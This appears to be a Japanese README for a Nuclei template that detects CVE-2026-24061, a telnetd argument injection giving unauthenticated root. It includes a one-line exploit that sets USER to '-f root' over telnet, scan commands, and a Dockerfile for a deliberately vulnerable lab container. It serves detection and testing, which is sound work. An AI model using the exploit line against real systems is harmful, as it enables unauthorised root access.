
Nucleiテンプレート:CVE-2026-24061を検出するためのもの。これはGNU inetutils telnetdにおける深刻なtelnet引数インジェクションであり、認証なしのrootアクセスを許可します。
GNU inetutils telnetd の CVE-2026-24061 脆弱性を検出するための Nuclei テンプレート。認証なしで root アクセスを取得することが可能です。
CVE-2026-24061 は、GNU inetutils telnetd における深刻な 引数インジェクション 脆弱性であり、攻撃者がパスワードを知らなくても root shell を取得できるようにします。
%U を含む新しいログインテンプレートが追加されました: /usr/bin/login -p -h %h %?u{-f %u}{%U}
脆弱性: 環境変数 USER は telnet プロトコル(RFC 1572 NEW-ENVIRON)を介して渡され、コマンドへの代入前に サニタイズされません。
悪用: 攻撃者は接続時に USER="-f root" を設定します:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
-f フラグは「認証スキップ」を意味します → パスワードなしで root 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
テスト用に脆弱な Docker コンテナを起動できます:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
起動:
# イメージをビルド
docker build -t vuln-telnetd .
# 起動
docker run -d -p 2323:23 vuln-telnetd
# 脆弱性を確認
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
このツールは、明示的な許可を得たシステムに対する合法的なセキュリティテストのみを目的としています。
作者は、このテンプレートの不正使用について一切の責任を負いません。
Created by Mr.Zapi